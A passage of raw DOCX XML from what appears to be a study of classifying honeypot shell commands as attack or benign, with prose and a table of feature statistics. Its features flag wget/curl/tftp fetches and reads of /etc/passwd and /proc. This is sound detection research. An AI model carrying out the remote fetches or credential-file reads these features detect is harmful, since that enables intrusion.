        <w:t xml:space="preserve">filenames saturate honeypot traffic), followed by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_fetch_bin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (21.9% of</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">attacks invoke </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>wget</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>tftp</w:t>
      </w:r>
      <w:r>
        <w:t>-class binaries vs 3.4% of benign),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_url</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (13.6% vs 2.4%), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_hidden_path</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (14.7% vs 4.1% — dot-directories</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">for staging), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_abs_paths</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_shell_bin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>head_is_privesc</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_sensitive_paths</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (attack mean 0.113 vs 0.032 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/proc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">reconnaissance), and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_ipv4</w:t>
      </w:r>
      <w:r>
        <w:t>. Base64 features, prominent on Dataset 1, are nearly informationless</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">here by rank (|r| ≤ 0.033) despite a huge attack-side variance in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>b64_run_len</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>(1,059 vs 68): encoded payloads exist in the honeypot stream but are too rare</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>to move the distribution's body.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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Attack mean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Benign mean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Effect (rank-biserial)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Direction</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>digit_ratio</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.083</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.037</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>+0.234</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>attack</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>len_tokens</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4.29</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5.85</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>−0.207</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>benign</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>mean_token_len</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>7.84</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>7.05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>+0.198</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>attack</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>has_fetch_bin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.219</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.034</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>+0.185</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>attack</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>len_chars</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>36.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>42.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>−0.171</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>benign</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>n_flags</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.48</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.92</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>−0.125</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>benign</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>head_is_lotl</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.013</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.131</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>−0.118</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>benign</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>has_url</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.136</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.024</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>+0.113</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>attack</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>n_quotes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.31</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.78</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>−0.112</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>benign</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>n_pipes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
